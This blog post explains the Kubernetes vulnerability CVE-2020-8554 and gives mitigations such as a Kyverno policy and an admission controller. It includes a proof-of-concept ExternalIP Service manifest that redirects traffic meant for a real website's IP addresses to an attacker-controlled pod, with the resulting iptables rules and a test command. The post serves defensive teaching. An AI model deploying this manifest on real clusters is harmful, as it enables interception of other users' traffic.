Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8554
In some of the talks I've done on Kubernetes security over the past couple of years, I've discussed the four unpatchable security vulnerabilities in Kubernetes, which are present in every cluster regardless of the version or patch level used. These CVEs require cluster operators to enable or block specific features or adapt their security architecture to account for them.
Each of the vulnerabilities is quite interesting, as it exposes some of the inner workings of Kubernetes clusters and their underlying technologies. All four of the vulnerabilities relate to container networking in one way or another, so they present a good way to learn more about the topic!
CVE-2020-8554 overview and mitigation
The first of our unpatchable four vulnerabilities is CVE-2020-8554, which was originally discovered by Etienne Champetier. This vulnerability allows a hostile actor in a Kubernetes cluster who can create service objects to hijack traffic intended for an external website and send it to a Kubernetes pod under their control.
To mitigate this vulnerability, cluster operators need to block the use of "ExternalIP" services. There are a number of ways to do this: enabling the DenyServiceExternalIPs admission controller on the kube-apiserver, or using a general policy-based controller like Kyverno to block their creation. You could also implement checks elsewhere in the object lifecycle, for example if you're using a GitOps approach to cluster management. Additionally, it's worth noting that if you're using Cilium as your cluster CNI with its "kube-proxy replacement" enabled, you're not affected by this CVE.
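As an illustration, a Kyverno ClusterPolicy along the lines of the project's sample "restrict-external-ips" policy might look something like the sketch below; the policy name and the Enforce action are choices made for this example, not requirements.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-external-ips
spec:
  validationFailureAction: Enforce
  rules:
    - name: check-external-ips
      match:
        any:
          - resources:
              kinds:
                - Service
      validate:
        message: "externalIPs are not allowed."
        pattern:
          spec:
            # the X() negation anchor rejects any Service that sets this field
            X(externalIPs): "null"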
Depending on the threat model for your cluster, you might not need to prioritize mitigating this issue. It fundamentally depends on there being a hostile user in the cluster who can create service objects, so if you have a very small number of trusted users in your cluster, this may not present a large risk.
CVE-2020-8554 technical details
What's interesting about this CVE is how it actually works. To talk about that, we first need to discuss the kube-proxy component of Kubernetes, which is responsible for service networking. This component runs on every worker node in a cluster and manages aspects of networking using firewall rules. Traditionally this means iptables, although it can also use IPVS or, on modern clusters, nftables.
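If you want to check which mode kube-proxy is running in, one option on clusters where its configuration lives in a ConfigMap (a kubeadm convention; other distributions differ) is:
kubectl -n kube-system get configmap kube-proxy -o jsonpath='{.data.config\.conf}' | grep mode
An empty mode value means kube-proxy falls back to its default, which is iptables on Linux.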
What this boils down to is that, when you create a service object in a cluster, kube-proxy will generate new iptables rules to route traffic that's sent to the service IP address onward to a different destination, usually a pod.
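The rule listings in the rest of this post can be reproduced on a worker node with a command along these lines, assuming root access and kube-proxy in its default iptables mode:
iptables -t nat -L KUBE-SERVICES -n -v --line-numbers
Substituting a specific KUBE-SVC-* chain name for KUBE-SERVICES shows the per-service chains discussed below.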
First, let’s look at a standard example. A service fronting a deployment of the nginx web server might look like this.
apiVersion: v1
kind: Service
metadata:
  name: nginx-service
spec:
  selector:
    app: nginx
  ports:
    - protocol: TCP
      port: 80
      targetPort: 80
  type: ClusterIP
If we then look at the iptables NAT rules on the cluster node, we can see entries created for that service, first in the KUBE-SERVICES chain.
Chain KUBE-SERVICES (2 references)
num pkts bytes target prot opt in out source destination
5 0 0 KUBE-SVC-V2OKYYMBY3REGZOG 6 -- * * 0.0.0.0/0 10.96.96.147 /* default/nginx-service cluster IP */ tcp dpt:80
And then a new iptables chain is created for the service, which redirects traffic from the service IP address to one of the pods backing the service. In this case our deployment has three pods, so there's a rule for each one with a probability attached: the first rule matches a third of the traffic, the second matches half of what remains, and the last catches everything else, giving an even split across the three pods.
Chain KUBE-SVC-V2OKYYMBY3REGZOG (1 references)
num pkts bytes target prot opt in out source destination
1 0 0 KUBE-MARK-MASQ 6 -- * * !10.244.0.0/16 10.96.96.147 /* default/nginx-service cluster IP */ tcp dpt:80
2 0 0 KUBE-SEP-ZM4U5IBMH7HRYQAC 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service -> 10.244.0.10:80 */ statistic mode random probability 0.33333333349
3 0 0 KUBE-SEP-WGFHUWJ6JX2S3AJW 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service -> 10.244.0.8:80 */ statistic mode random probability 0.50000000000
4 0 0 KUBE-SEP-YF4SAX6DPLSRSFFX 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service -> 10.244.0.9:80 */
Where the vulnerability creeps in is with a specific type of service object: the ExternalIP service. This allows you to specify arbitrary external IP addresses and have traffic destined for them forwarded elsewhere in the cluster.
As an example, the service object below (taken from this POC) takes traffic destined for 104.16.185.241 or 104.16.184.241 (the IP addresses for icanhazip.com) and sends it to an echoserver pod in the cluster.
apiVersion: v1
kind: Service
metadata:
  name: mitm-externalip
  namespace: kubeproxy-mitm
spec:
  ports:
    - name: http
      port: 80
      targetPort: 8080
    - name: https
      port: 443
      targetPort: 8443
  selector:
    app: echoserver
  type: ClusterIP
  externalIPs:
    - 104.16.185.241
    - 104.16.184.241
If we look at the iptables rules on the Kubernetes node after creating this service, we can see some new NAT rules, showing what's happened.
First, some new iptables rules have been added to the KUBE-SERVICES chain, which match traffic being sent to those two IP addresses.
Chain KUBE-SERVICES (2 references)
num pkts bytes target prot opt in out source destination
4 0 0 KUBE-SVC-RBLPB57WNTQX7QAT 6 -- * * 0.0.0.0/0 10.96.206.161 /* kubeproxy-mitm/mitm-externalip:http cluster IP */ tcp dpt:80
5 0 0 KUBE-EXT-RBLPB57WNTQX7QAT 6 -- * * 0.0.0.0/0 104.16.185.241 /* kubeproxy-mitm/mitm-externalip:http external IP */ tcp dpt:80
6 1 60 KUBE-EXT-RBLPB57WNTQX7QAT 6 -- * * 0.0.0.0/0 104.16.184.241 /* kubeproxy-mitm/mitm-externalip:http external IP */ tcp dpt:80
7 0 0 KUBE-SVC-O76I5Y3LZD7UNKAZ 6 -- * * 0.0.0.0/0 10.96.206.161 /* kubeproxy-mitm/mitm-externalip:https cluster IP */ tcp dpt:443
8 0 0 KUBE-EXT-O76I5Y3LZD7UNKAZ 6 -- * * 0.0.0.0/0 104.16.185.241 /* kubeproxy-mitm/mitm-externalip:https external IP */ tcp dpt:443
9 0 0 KUBE-EXT-O76I5Y3LZD7UNKAZ 6 -- * * 0.0.0.0/0 104.16.184.241 /* kubeproxy-mitm/mitm-externalip:https external IP */ tcp dpt:443
And then two new service chains have been created; the KUBE-EXT chains matched above jump into these KUBE-SVC chains, which redirect the traffic to the echoserver pod.
Chain KUBE-SVC-RBLPB57WNTQX7QAT (2 references)
num pkts bytes target prot opt in out source destination
1 0 0 KUBE-MARK-MASQ 6 -- * * !10.244.0.0/16 10.96.206.161 /* kubeproxy-mitm/mitm-externalip:http cluster IP */ tcp dpt:80
2 1 60 KUBE-SEP-E5TK4BVO3WYA3RYQ 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* kubeproxy-mitm/mitm-externalip:http -> 10.244.0.6:8080 */
Chain KUBE-SVC-O76I5Y3LZD7UNKAZ (2 references)
num pkts bytes target prot opt in out source destination
1 0 0 KUBE-MARK-MASQ 6 -- * * !10.244.0.0/16 10.96.206.161 /* kubeproxy-mitm/mitm-externalip:https cluster IP */ tcp dpt:443
2 0 0 KUBE-SEP-3YMEZLBEPIJTVSFJ 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* kubeproxy-mitm/mitm-externalip:https -> 10.244.0.6:8443 */
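To see the hijack in action, you could make a request to icanhazip.com from a one-off pod on the cluster; the pod name and image here are just illustrative choices:
kubectl run mitm-test --rm -i --restart=Never --image=busybox -- wget -qO- http://icanhazip.com
Instead of your public IP address, the response comes back from the echoserver pod, because the NAT rules above rewrite traffic destined for 104.16.185.241 and 104.16.184.241 before it ever leaves the node.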
So once you realize that services are essentially just iptables rules, and that rules can be created matching traffic destined for arbitrary external IP addresses, the risk of traffic being redirected in an unauthorized manner makes sense!
Conclusion
This blog is the first part of a mini-series looking at the four unpatchable CVEs in every Kubernetes cluster. In the next installment, we’ll take a look at CVE-2020-8561 and explore some details of Kubernetes SSRF attacks.